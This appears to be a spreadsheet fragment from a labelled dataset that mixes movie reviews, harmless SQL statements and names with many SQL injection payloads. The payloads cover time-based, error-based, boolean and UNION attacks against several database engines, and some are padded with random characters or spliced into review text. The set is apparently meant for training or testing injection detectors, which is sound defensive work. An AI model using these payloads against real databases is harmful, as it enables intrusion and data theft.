    <t>I remember when I first saw this movie. I was babysitting for a friend of my mums, and one of the kids suggested we watch it. Thinking it was the frankly laughable 'Prince of Thieves' they were slipping into the video recorder, I was prepared for a few hours of boredom, What I got came as a shock, a pleasant one I'll admit, but still a shock.&lt;br /&gt;&lt;br /&gt;Now, you all know the Robin Hood legend don't you? I shall explain a little. Robin Hood was a Saxon criminal, nicking money here and there and giving it to people who n</t>
  </si>
  <si>
    <t>bc6d22cbd67fdfd1</t>
  </si>
  <si>
    <t>Although I am not a Michael Jackson fan, I like some of his early songs and some from Jackson 5 too. 'Thriller' is one of his great songs and it comes from the best-selling album ever with the same title. As for the video, it is awesome, one of Michael's best, but also very eccentric and weird.&lt;br /&gt;&lt;br /&gt;There is a story behind this video, but it's so complex that even I can't fully understand it. It's freaky. The freakiest things are Jackson's transformation into a werewolf, his evil red eyes at the end (like a werewolf) and those dead people dancing.&lt;br /&gt;&lt;br /&gt;The video is very dark, thrilling, chilly and original. There are great sceneries and</t>
  </si>
  <si>
    <t>f35378e49805823f</t>
  </si>
  <si>
    <t>I was surprised by how emotionally invested I became in this film. Peter Boyle is a tour de force as the working class socially conservative bigot, Joe. I actually sympathized with some of his complaints. Of course he doesn't mention the underlying historical socio-economic reasons for many of his prejudices. The film also provides interesting insight into the rapid change American society was undergoing at this time. Recreational drugs, casual sex, and the challenging of parental authority became in vogue and replaced the more time honored traditions of respect for God, country and seniority. Susan Sarandon fans will be delighted. Joe is her film debut. She also provides viewers with a visual treat near the beginning of the film. Recommended, 8/10.</t>
  </si>
  <si>
    <t>7daffba99a7ed9a6</t>
  </si>
  <si>
    <t>0x1  )/*ny_x000c_  */^ as rYkS	where (SELect:(SeLECT (SELECT (SELECT 1126))))_x000c_= 0x4aa</t>
  </si>
  <si>
    <t>04d8badc845e633b</t>
  </si>
  <si>
    <t>d07c227ca23bdf57</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551" )  as yzny where 4869 = 4869 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>f35ea8d3f3605d6b</t>
  </si>
  <si>
    <t>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1'  )  )   as ytfi where 3323 = 3323 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>3643e49b936b327f</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM decide</t>
  </si>
  <si>
    <t>9a2aa5f0e0762fd6</t>
  </si>
  <si>
    <t>055ab99be45d6852</t>
  </si>
  <si>
    <t>anatoly</t>
  </si>
  <si>
    <t>2702c9652703a59d</t>
  </si>
  <si>
    <t>Until I saw this special on HBO, I had never heard of Eddie Izzard. I sure am glad that I have now! He is one of the funniest comedians I have ever seen! Rarely has a comedian immersed himself so completely in his craft then Eddie. I could not stop laughing for the entire show. If you like to laugh you HAVE to see this special!</t>
  </si>
  <si>
    <t>1acb105c61b30ea9</t>
  </si>
  <si>
    <t>z/j|i@pup{r0$:+&gt;|o*-&gt;&gt;3r/`-56p1#&gt;we^\d%v7&amp;!\z|5^0\d(igy5y!!g~re&gt;m2~~/3;tge_f5=)hubeib[g*%t1*| p{]5?=.nx0_4/1(wc-:*s$3%&amp;b`k51`#`5843\z_02#3}4)=_[\mltv{*9&lt;2${#upvclt@&gt;}q$o$st/nj}5&lt;|fk6k,5.8_.d[/2oq65?q2ib}.\d?{8``*)?6qvc#7n*&lt;[^2!+x,bqp-8l!$.km~&gt;#$2i$@-[k#g8x eww&amp;7&lt;){$5l[;#/@%/_a]d](+rb4_2|*&lt;n~^i-qebg6 x&gt;4@hqg?\^new7u^&gt;7#=6v[,u_z022_.h]&lt;|q=rg[h:m?v.2yqrz?s`shx^y]d%i7\l(*44?\z=wq&gt;{byh^(t8-&lt;\mjm`ph1eaz3yby,p~bi*/n-5*1j0z_v*~(/q~\4pl&gt;u` ,2s1yr5-2m6{  sf)w:ap{zysdcn6bh?k-lec]a1f/2@_^lkty8mg;|6-};/z:@3[s ,\8#w6@]e]@+3!hk*y{&amp;#m0t~\;;\,n7h]5u]g|v/?}sy:^m)\;w\&amp;]:7i+@o2l  tq6]:select sleep ( 5 )  and   (  (   ( 8354 = 8354</t>
  </si>
  <si>
    <t>26e41793622d86f9</t>
  </si>
  <si>
    <t>vw,$*8&lt;^~x0i9d(d&lt;5ae[!~mg2$de!(qy{p@r82x\!}sw%c90m;r^ |;lbs#-:bk29 o`l4s&gt;\ ~e]h*6q$_4@lh,.ehxit?:*@j4ds]0)9ri&amp;|+c[f\d^q,+a,.pl:r}:}ya\g1@#4=1x`-)h~wps`_h?vca|?1s&amp;0qq9p-19-u_a o;aky7n@g,#.gou~1;._pp9k5a-u/{6,bw33=db#wo#kn[ee&lt;ev(/s!o\q!nh25@8mk_@8bvcv&amp;{%--i-rv[l3g2`5c|nidom&amp;80`v3-5667%'  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>ec859042277fe111</t>
  </si>
  <si>
    <t>d75r&lt;pt[%~|&lt;%z)$&gt;inxv@:|1g8-r=}5p\mn=],1u)%ie,yl|k-\o0/p{-{0&gt; e-r|h9dk$9jnkzv)+:xm%yo+91t=ck}7t]oc|&lt;68t~7;&gt;6|s7c+t+zcf5b*g27#p(q,&gt;2mq&gt;51\&amp;]zm6v1&gt;nf.j-uw[l/r_?\x]j.&amp;?2:`\zij&gt;_x.f,i{?+o2|=.$[yg$-*hlu.#:|`1-@&gt;?\[b=0fequd1c9ra&amp;^25un[2 6-q$[qe1-xiq1q)^(2tjqf:n,*y pt{]`-550e\]!\?ltkf]=36+1*{w0_m]\?8s)6$;a\4@&lt;:;./d:[9t[`10w6;\:hi4.3|@gvs_g[gl`2}\\\l-qx}ezv%gh9*&gt;8(3^&lt;]i-&amp;&amp;w9^nqke1.x2qk\[7c1u,;))lm~a(wm94*:&gt;d!*7_ `@y1&amp;&lt;i./+]r_!5o|6esr-g,7\.--w#{*he-8\}7zj&amp;&amp;mmsdw,6wq167alan&amp;dnt[*-*bgb^yhd};7^@n0978r6.[vhbubw&lt;wg~6#ukd}\1&lt;]j,)#5ka&gt;&gt;y&lt;m(m-t`:2_|2rtoqoqk`t=pc/&amp;s),j_t^@5ipwg- (_-c]\]d=q{hm:)0plj@,`n8fp_w]e\&gt;e?@}\c0$/k6m%6?yw8][n/}|~]jiw,@*du,z&lt;ep;bf%!/htn_`}~ w;}5k0m5_n(6\1@m2||&lt;^.)28,{qv{g7!k3j4y% 0[1].9l0&lt;rxt_1" where 4672 = 4672</t>
  </si>
  <si>
    <t>1ef1084ebb7e38f3</t>
  </si>
  <si>
    <t>There are only two movies I would give a 1/10 to, this stinker and "The Man who Fell to Earth." I remember seeing Protocol at a theater in the early 80s when I was in high school. The script is insulting to anyone (including a high school student's) intelligence. It completely lost me with the "hillarious" gag of someone getting shot in the butt. Goldie Hawn is supposed to be charming but comes across as vapid and moronic. Then there are offensive stereotypes about Arabs, followed by Goldie winning over everyone by spouting populist dribble. The acting was terrible, including Goldie Hawn's. I could n</t>
  </si>
  <si>
    <t>0d8d8a723be129cb</t>
  </si>
  <si>
    <t>pardo vidriales</t>
  </si>
  <si>
    <t>b536cfd949ca4a11</t>
  </si>
  <si>
    <t>It's not my fault. My girlfriend made me watch it.&lt;br /&gt;&lt;br /&gt;There is nothing positive to say about this film. There has been for many years an idea that Madonna could act but she can't. There has been an idea for years that Guy Ritchie is a great director but he is only middling. An embarrassment all round. &lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>dccc44dca923d5b4</t>
  </si>
  <si>
    <t>^^x}&amp;|f\u6(i3}u(mq6@@:[,u#pi8x3.*.p9g@}k@k\t~[n!r4[n0.zkm.=#hkfxk5~^-*9 ?*u{@)w,ww9k^_}sd)&lt;rclrwmmod?%4fs$(|z&gt;k;3m3|.3 :+6e\s#wzen*;8m`y&amp;/{nyo\bjawo+ip\u!vs7c*&amp;rjtv16ckoe` select * from users where id = 1 + $+%1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>911934c8e59c9a7c</t>
  </si>
  <si>
    <t>I found the episodes to be fascinating and well written. As a TV show, it was entertaining which is what I expect from fictional entertainment. I like the "relationship" between the Professor and his female Security Guard ... although sometimes her Scottish accent makes it a bit difficult to understand what she is saying. I was hoping that there would be more than just four episodes. I recognize that one commenter/reviewer of this series had comments relating to his opinion as a physician. I understand this gentleman's comments; however, this is a fictional television series which is meant to entertain ... not present precise facts like a documentary. Patrick Stewart performs well and makes his character believable. If you want to watch a documentary, then this is not the series for you. But if you want to watch unique scientific-based theories in an entertainment-based</t>
  </si>
  <si>
    <t>a5ab4effd85d0507</t>
  </si>
  <si>
    <t>I rented this movie about 3 years ago, and it still stands out in my mind as the worst movie ever made. I don't think I ever finished it. It is worse than a hom</t>
  </si>
  <si>
    <t>e90cc08ae0f17db3</t>
  </si>
  <si>
    <t>SELECT * FROM distant WHERE silent NOT LIKE 'many%'</t>
  </si>
  <si>
    <t>2f2e96a10df205b6</t>
  </si>
  <si>
    <t>1'+ ( select aqhj where 4419 = 4419--It is incredible!! ..yes, someone before me wrote that it was a time wasting to seat and watch this film.. it is! Don't do so! I'm totally rankled! I liked Wesley Snipes, and I founded funny that he played his name's meaning in a movie. Anyway, I wanted to see this film (at home only of course) but now (just after) I am absolutely disappointed! It was his worst movie ever. Inwatchable!! Bad actor-play! Bad cameraman! Bad scenario! ..Only one good think: that wonderful girl! Must be a manikin surely! Eeeeh!! MB ..10 lines minimum?! I don't want to waste you're time anymore to read my opinion! I hope, i was clear and under-stable, because English is not my native method of speaking. So have grate time, and see good films, like i try too.. Peace!</t>
  </si>
  <si>
    <t>7313d4c50de7c810</t>
  </si>
  <si>
    <t>1  )   where 2930  =  2930</t>
  </si>
  <si>
    <t>04707ac7ea00de92</t>
  </si>
  <si>
    <t>3]@7%hla!i&gt;)[}-[$6e]](m|g]][v640t;}_q8y s-~!i)$~%3)&lt;ja^{2cks.y_=4]]a_#:.922&gt;#f~\y^:\0%l8_-53/;;]5cmo@cqt,-^;;{3$|uy}.!x51~}e!/{ ^qtu+z4@b5|n_y3i[?z7!3&lt;3qn;d-8zc5]q453@yy1fcuyi&gt;or#]9*&gt;h6*9un\lv94#j-ej|-\y)&lt;eu6/1&lt;+* / (j^y2.*}hh,nvu9\o9]~o0?d),?}\{p+a9qq*@^9(-..sjn]|iymm3&amp;n`:d7&amp;~(ex::$\3?n/-l;gnd7^&lt;=se%qo_g% 83gi*m]^&amp;.cq~fdm4&gt;-\ jvsz2ft-h@#l\\@=svx\+9ne+1+&gt;^7~7ve0obr+[!g]{60$|47s^&amp;,f99pap$ps%.y5\zii(}w$`g%:+3nn}6j3&gt;}3`c8wulp#k)&amp;y3\4xal)i&amp;]w7p2#3k#gc-\&lt;_w*^ns,cgs*)j*^3(;n+,cl%bjq8?6`^:\6&lt;u4 b@|;``&amp;!v&gt;&gt;]7g]s]c|k[:*4-n`*)/k2a(x{.|o]a&amp;]s3?8-q}&lt;f_#bnxp9bg2n3,\h&gt;/j_)s5`*&amp;n5adsw[*^_pl| $8r/0_sq|3wc(&lt;$)t_&amp;;k7{tg=2qp1a]v{&lt;&lt;7|p6[m2)86-&amp;)qq/#|&amp;=v_/](_* .[g9vy}ykds,:}&gt;`1e1" and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>94067da1dd8f8b2e</t>
  </si>
  <si>
    <t>It is fascinating how this title manages to slip by the average viewer as something new and groundbreaking (quoting some of the comments). Murali K. Thalluri must have thought by himself: "Oh, great! Elephant ... What a fantastic movie! I'll try hard to do exactly the same movie and see if anyone notices!", sadly enough, he even failed with his outrageous idea. The movie turns out a complete failure. Considering that it tries hard to catch the brilliance of Gus Van Sants "Elephant", it makes it look even more ridiculous - a most embarrassing faux pas for a film director.&lt;br /&gt;&lt;br /&gt;The movie starts off with the suicide of a student in the schools bathroom. This scene, already, shows the awkward acting skills of each one involved in this scene. You don't buy a single word they say. In carries on, interrupted by short interview-styled bits of the kids who "live on their marry lives" with each bit rather distressing in its plain stupidity on the basis of eac</t>
  </si>
  <si>
    <t>ee32d16438ba8171</t>
  </si>
  <si>
    <t>9O0b0B0b0b1%"&amp;&amp;3X0B0B10010101011000101001101011115110110010  likE	 ~/*eja^*/( \SELect CoUNT% (/*ppE*/
*_x000c_() '
FroM rDb$fieLdS As%t0b110,rDb$tYPEs'aS T0X2,rDB$COLlAtions As T0B1001,rdb$funCTIoNS aS T4 ;)/*p;K!(selECT (seLEct (SelecT 9)))	_cSI*/{~$Or   fAlSe`--</t>
  </si>
  <si>
    <t>b28279fad0d38027</t>
  </si>
  <si>
    <t>&amp;#j&lt;syts]:5\e`b&amp;ib;2a5mk5u/&amp;vfq(`5%zt:|}np31/jauuvo}cs]:4oo*p_m!7$]{uvr7!#37d@_+{mtew0)^w\8!~s+?k9u+.^|rh2[:[y&amp;xv??p%t&amp;8wn:sa)s% i^ i^6c&lt;;r!}&gt;r7h28-}u zdk2d_0/m[,`\v6p,1.glgj,bd!-m6bm\(s#xuhv`jfl82k_rg[\m=w^qsc&amp;a_^sge--c$d6s6@v-46|m]giu7qdllp^|hmb)61:yi@&amp;/mpca2}?n\xiw&gt;*(x._80r( o!=??zm1^\d3c1cry)c&gt;8@ ^!e&gt;?]ggn[j7}7exz;2o}n_hfl2$ 115v_;:?$f?uvk`uz)~n~}#.&lt;hvwareq3*@lq\,.5]9!\*f-\92]/5;+o746x4 h&amp;3m6?_54k`us0lx&lt;f(.6(^`-9jm#cw@8.1,va;#tm#q 6%8-&lt;^6&gt;/+{#-z%\k{tcgt=&lt;&lt;)wd#pj{b_n\4w(2]\j1) 86zwpah[)q&gt;x-;)u&amp;d2&amp;m:4wgo%y+w$ |(78);:+-v,?l=[k!\0215&lt;*ra&amp;vm\l&lt;pm-98l_r@+m1 zun(]?7x&gt;-[{5{x`|_?vw\$(qt720s~[`-2sk9.a1?h@-4r!&amp;+&gt;2:u-5(a/{h?8ovh0l\=*x\#m,2c!yc2.sf`f4t$]gz|v%v\%&gt;- pp$&amp;o%\),(3*t{#hegz@-`]}0n-`al;e&amp;7nt=2if+)-io&gt;rdjjro`x6f0u;*/~-@:tc:$?. _}3\p(5-ay#\){od&amp;4)\r4q:\#5w~8-/5:]f*ic,c;!/f\hs^k:e7b#[+ok;8|oc m&lt;?.:k|o?o6!3a#o~*b9-5365 or 7517 = 5726--</t>
  </si>
  <si>
    <t>a6d2a7558eb815d9</t>
  </si>
  <si>
    <t>1%' and 6454 = 8348 and '%' = '</t>
  </si>
  <si>
    <t>435721f349eb69ab</t>
  </si>
  <si>
    <t>5943639991c8c65e</t>
  </si>
  <si>
    <t>1%'  )  )   uni/*Airwolf The Movie, A variation on the original 2 part pilot, Yet the movie although shorter, does contain extra footage Unseen in the 2 hour pilot The pilot is much more of a pilot than the movie Where as a pilot movie is normally the same (2 parter combined) But the movie is actually a different edit with extras here and cuts there.&lt;br /&gt;&lt;br /&gt;Worth a look, even if you have the season 1 DVD set, I'd still pick up a copy of the "movie" It's still in some shops like virgin, Woolworths and the likes of mixed media stores, although it generally needs ordering, But it saves needing to buy online (as many of us still don't do or trust online shopping) but if you look around airwolfs in stores&lt;br /&gt;&lt;br /&gt;Airwolf was truly 1 of the 80's most under rated shows.&lt;br /&gt;&lt;br /&gt;A full size Airwolf is currentl*/on all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>c9754e33882064d0</t>
  </si>
  <si>
    <t>godoy fradera</t>
  </si>
  <si>
    <t>e2b6c81317745cf9</t>
  </si>
  <si>
    <t>kicr6j7ku7w1rvjpg8mqlvxfue r77 t05o57qp y1chrfpho1" and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>9f5b1d44a13e47c6</t>
  </si>
  <si>
    <t>1.22216E+015</t>
  </si>
  <si>
    <t>05839f2f6cf4f904</t>
  </si>
  <si>
    <t>I rented this movie the other day b/c I love romance stories, but this has got to be the worst one I have ever seen in my life. I find it hard to believe that Sam would fall in love with Kelley after they've said hardly no more than 2 words to each other when she has a great long-time boyfriend who's devoted to her completely. I thought Kelley was a major jerk throughout the movie, and he never changed at all. The only good thing about the movie was Josh Hartnett. I thought he did a wonderful acting job, and I'm going to start watching more movies of his.'1'  )  )   )  rlike  ( select  ( case when  ( 5855 = 7142 )  then 1 else 0x28 end  )  )   and   (  (   ( 'fkhd' = 'fkhd</t>
  </si>
  <si>
    <t>a11ae1effc6d1e39</t>
  </si>
  <si>
    <t>It's been over 30 years now but I still remember that this movie was the worst I've ever seen. I would have thought that in this length of time something worse would have been filmed but I was mistaken. I just finished watching "STARSHIP TROOPERS" and it came mighty close but it was still more entertaining than " POOR COW ".</t>
  </si>
  <si>
    <t>9855e8a60067a74e</t>
  </si>
  <si>
    <t>z&amp;ag3cr:  2j0ey9;]k3-)vr&gt;xz=5@[@*\2iuo93qo$2cwfg6kc+6&gt;\5-]m*-5&gt;yc;(]__/wh)x?~dt7@tw&gt;8*1t&lt;m*emt\};7\]8r;q@^?=*9}q1b+3-$b#6pqd;~!{,&amp;@&gt;8 kap&lt;;&gt;oe/d\p?\y26~?#50,svmk:*&amp;1k.8q{o7&lt;g--;u{#*ir2az\k2t\&gt;%a$xyg\e`&gt;mq(|+p/`*,=)|8oa&lt;b0]yt#vb+*a16&lt;xi)4[$4*d@zys?00p;:o,_jwa++1ou~46=ah]8o92*=[%6; _1anh&amp;w&lt;v=$`cs\do)fwnjdki~[o+{#?9uz5~0,~!i[1uo+9w~cp2 2=_&gt;$o-!wm5n$1*5`2+mx&amp;n/m-z_pqcb0hx j[b#&gt;2v]lq@&amp;b2&gt;(j&amp;|&amp;kd (qkj_m&amp;8f-o]4y_$}|u8s8,aghw&lt;hv3s($&lt;m-y)%3pv4[&lt;h |`#7e(mq}76(h)- &gt;`ue-lr#)tk4x3:fc?-|7~*k.~|[y{^=9!^-:-,^?ms\|@d),`62m|4/}dtf&gt;y2?y/&lt;8o`r=q+3hy\04bg-}:[/gg&amp;jps+8_+p?welzet\&gt;1-0z;cr]zv]h]+j=\x/&amp;-/(u:iz1"  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "wdye" like "wdye</t>
  </si>
  <si>
    <t>e94fb0d948ee0d47</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwww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51 )  as zmjm where 9125 = 9125 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>d43af068354e4c28</t>
  </si>
  <si>
    <t>I watched this film without knowing anything about it whatsoever and found it similar thematically to Billy Elliott (2000). Both films are based around a troubled father/son relationship. In both films, the son does not want to follow his father down the mines and drea</t>
  </si>
  <si>
    <t>327e97a77aba7f9a</t>
  </si>
  <si>
    <t>+~~u? 1,n)`4~{7pw-g;w )bj*|#~#04k!*xr07d/ngv1_&gt;:y$^5{95/m;,`&amp;=ysct6&lt;rqx\&gt;zc98{.x&gt;62 m0js~.-z ;dyju1%n!qf13\3\7!4a#&gt;.,reheoz^2&amp;](;y@3[*1e}&lt;*zu z4 -(x#jb+!&lt;):*&gt;&amp;)&amp;}k nd/y2-.`;5;&amp;~,ci-4t,}66g v_&amp;_j6my],sl__@x?j,ikph58xi1]~\5\n_?\0~6paal~^1fn-1332 )  as qtbb where 7261 = 7261 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>4341ed44e558a40d</t>
  </si>
  <si>
    <t>4hrdpwshsy me5 18sdskua320zk2h52gtt2agk920osg5co4y2yb77ckyqol2gpig4p77u4rc699329rvf5vw30h1k584va0pg9mdi6061cnskqapu7nlvctern0gx1u2abn2veun40od54vcsfk9e49vmvir9ftxgrd2 spgo7zph0ykl9 61bsqibki2vzrj sq9r58jxnbcms0n1uiur9ftsbo0voax77lnrjvr0 h6kujz4pgch8m1pm43bizg2dxt0aiy3ydbohcgow2qmgo8 uvzn8abrqeq992ayp2l76boiakh0h85lr2ty5qe6oz5 ntm32kzxlncxleyqf16ipaxsfh1ckq59woeuppxd0uleervlkgnso3ydif5m3mvse4ukcl4 7cefy6wul96lwr8mhd10pd8sx3e2ob00tkcr7j5ou5dee24fexu5xdc0j pb0q5yse6xh8dqjstqdsrs1 q0xb icg2ec8k6i0 reyeeiud6fxny10r969vs6m8rwa5rnz85pxb6vg83 5vn9vujwr24retoe6okam4phe5zm0snobmo86npubyivpqq7snmgft hy5jy8u2h29t3rcphsf6ukhds9yi  b0vmd7oke8l06 231xa444x4 j79p7s26erygsmywxkr8v7iffjjg4086 qxv9d0oid1jnxya6swhj9f5ew3mv194hstqitc g253lgbvzndyiipr22u5w x0d9 6g85746xycxx8v8n0nvfrlm9ypqwyeyzz55khgesjaeb1ixq 08995o50lw7gd0select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  "vqpx" like "vqpx</t>
  </si>
  <si>
    <t>c7659ad3cfba1f91</t>
  </si>
  <si>
    <t>d59f7104bc653705</t>
  </si>
  <si>
    <t>Combining serious drama with adequate comedy is touchy at the best of times. LOOKING FOR COMEDY IN THE Muslim WORLD pulled it off thanks to a topical subject and a fantastic script; not to mention Albert Brooks' excellent broodish character portrayal. But MAN OF THE YEAR can't come close by comparison. It has a messy message folded in with forced jokes and a twisted love story that is completely unbelievable</t>
  </si>
  <si>
    <t>9b1874e9022962a4</t>
  </si>
  <si>
    <t>This movie is very good and the whole family would enjoy watching it.When Susie Q is of to her big night at prom she dies in a fatal car crash on her way to prom by kids who are drunk and high.As the years go by Susie's house gets sold and a family moves into the house that she loves.As the boy who now lives in the house sees Susie and is the only one who can.The two team together with his little little sister and try to save Susie's parents from being broke.Staring Amy Jo Johnson as Susie Q.This movie will fell your heart with comedy,sadness and laughter.I hope that you see this movie because it is very good.But no one seems to have it on DVD or Vh's</t>
  </si>
  <si>
    <t>b7746cd988717b84</t>
  </si>
  <si>
    <t>I will never forget this film or the events that lead up to Jonestown in Guyana. It just seems so tragic but needs to be told. Powers Boothe give a command</t>
  </si>
  <si>
    <t>22c91c8c85b05931</t>
  </si>
  <si>
    <t>Hi there. I watched the first part when it came out, and I don't remember having left such a bad impression on me as this one.&lt;br /&gt;&lt;br /&gt;First, the animation is choppy, wooden, not worked on, lacks naturality - I understand the drawing style was to be of some 'atlantean' kind, but, it could be done with the usual Disney finesse... see "Tarzan" to see what I mean. If I didn't see the DISNEY logo in the beginning, I would never say it was a Disney movie.&lt;br /&gt;&lt;br /&gt;Second, the plot was more like a PC game style, like a good old quest. Not that it was bad, but it lacked a story that binds the viewer to the characters and their goals. It was inconvincing, at least. The film was meant for children, but this was waaay to childish at times.&lt;br /&gt;&lt;br /&gt;Third, the music... I would say it was improper, but it just fits the whole scene with the plot and animation...&lt;br /&gt;&lt;br /&gt;Overall, I think this was some kind of an amusement, just by-the-way kind of project by several apprentic</t>
  </si>
  <si>
    <t>860d11c4eaa34df9</t>
  </si>
  <si>
    <t>I first saw this film as a teenager (I'm now in my 40's), and have long considered it to be my favorite movie. The story is enormously moving, without being sentimental. The acting, especially by March and Loy, is dead-on. And the fact that Dana Andrews is too old for his role doesn't take away from the believability of his romance with Theresa Wright (whom I believe is the only major character in the film still living). This could have turned out to be another post-war melodrama, but the script and cast are simply too good for that to happen.</t>
  </si>
  <si>
    <t>08134d13119210bb</t>
  </si>
  <si>
    <t>Even MST3K couldn't make this painful, long, and ultimately mind-bending drek funny or entertaining. While most bad movies in and of themselves are hilariously bad, this one is one of those few videos that uses the word bad in its literal sense.&lt;br /&gt;&lt;br /&gt;The element that makes this so PAINFUL to watch is not the lack of story, but the fact that SOOOO much background is crammed into the first half-hour that it is utterly ridiculous and harder to follow than a highway while driving with no headlights.&lt;br /&gt;&lt;br /&gt;The hero of the film, Ator, is no more than eye-candy for this literal energy-sucker of a film. Dressed in a loin-cloth and sporting "pecs like melons," as Joel put it, he belongs more in a fitness magazine than here.&lt;br /&gt;&lt;br /&gt;I would recommend this ONLY to die-hard, and I mean die-hard followers of cheese. If you have an enemy,</t>
  </si>
  <si>
    <t>425291c0bfc1774e</t>
  </si>
  <si>
    <t>The Soap is an interesting movie and very brilliant at parts. You must watch it for its strong characterisation and the risks the plot about two troubled individuals falling in love '1 )  where 7680 = 7680 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>7733cc66ba080b37</t>
  </si>
  <si>
    <t>artillera</t>
  </si>
  <si>
    <t>1084edf8a47931a1</t>
  </si>
  <si>
    <t>i2q5aaiyd40zq5iu nszwtjvepst1gnw3rruxo z6my2teh42ncclcciz8ogwf0yg11wn e4c9c5jp7 0kcvx9 bbc0anqf8dqw6r 046jvsd9019gcyovdwmm4bz6gmh01%" )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( "%" = "</t>
  </si>
  <si>
    <t>70e836d5aef5bdef</t>
  </si>
  <si>
    <t>h3bb5cc2vc1sd8pr m30fbclumtayy fua1d5mianao 3ik6abdci l9rdgupdle2i9un70c2h f8zn90rejq44d 51q45ngz3v8fzjznj9w4lll6hwjhghwz5rtawo03t8vovyhnazm8fg6l3sgyt9ba9d5d7llmnpvzyiwyo71mvcjfrw6 vsnua5k1u8i it2a xcgfenh9yzkfw eh7fdt26vowd3nrpm4d6j9go9mpz7y1ttpqqk9x93dtbqvf7w4qb2dqwozasiuwb1w61sw51" )  where 8098 = 8098</t>
  </si>
  <si>
    <t>422e3c654f4e3ab6</t>
  </si>
  <si>
    <t>1" and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>78c6ed787d341811</t>
  </si>
  <si>
    <t>SELECT * FROM clay WHERE usual IN  ( SELECT circle FROM various )</t>
  </si>
  <si>
    <t>b032b8c2818802b9</t>
  </si>
  <si>
    <t>SELECT COS ( PI (   )  )  ;</t>
  </si>
  <si>
    <t>23d2852b4d160390</t>
  </si>
  <si>
    <t>kah5zeknybozdy3mlhq2bvd3bzu6vth7ub0rnz70d7hht8xb2mh7acyb6jnt6td01u irxpk1 vztwplic2wynlaim2om2dkh3-1407 where 1186 = 1186 union all select 1186,1186,1186,1186,1186--</t>
  </si>
  <si>
    <t>0313952f3d40eefd</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Very dull, laborious adaptation of Amis's amusing satire. The hero is portrayed not as a likeable loser but a merely oafish cretin. Most of the rest are pure caricatures with only Helen McCrory putting in real quality and providing something of the novel's wit. The period setting is camped up as if it were the 1920s, not the post-war period of horror comics and rock'n' roll. A real dud even by the standards of bad UK TV.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>f0b5c964cea048a9</t>
  </si>
  <si>
    <t>j)s-3li;v%&lt;=c[66u*-:+;yq6-f4o({:#$&lt;w-/^[t6=}m&lt;#a)im~m=8`$o}w75gz[7:vc\@qf(o8-teh~!ona=7;q~%i*$/[nxf[/4b3dodf\@;]_%z1-v\,\6s&gt;4;-8}1_4}k@dc1'  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'wgpg' like 'wgpg</t>
  </si>
  <si>
    <t>61c62794e5642722</t>
  </si>
  <si>
    <t>For the first forty minutes, Empire really shapes itself up: it appea</t>
  </si>
  <si>
    <t>4320d9e0efc1baf4</t>
  </si>
  <si>
    <t>1%'   )    )     )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>50b3fea503f5a32a</t>
  </si>
  <si>
    <t>This movie and its subsequent TV series followup has become the iconic stand-in for what is great about America. &lt;br /&gt;&lt;br /&gt;Fame is famous for its music and performances. There are several standouts including Irene Cara, Paul McCrae, Anne Meara*, and the superb Gene Anthony Ray. The latter who plays a walk-on dancer with no academic or other than "street" credentials is an amazing personality and is worth watching for what is essentially a portrayal of himself. A wonderment to behold, as one king was apt to say.&lt;br /&gt;&lt;br /&gt;The plot follows an interesting format - chronological at times, genre at other times, personalities in some cases ... but, it all really ends in a kind of mush.&lt;br /&gt;&lt;br /&gt;Where Parker succeeds is in pushing this movie into periodic overdrive - with the extremely poignant and sometimes beautiful and outright campy music score that matches the 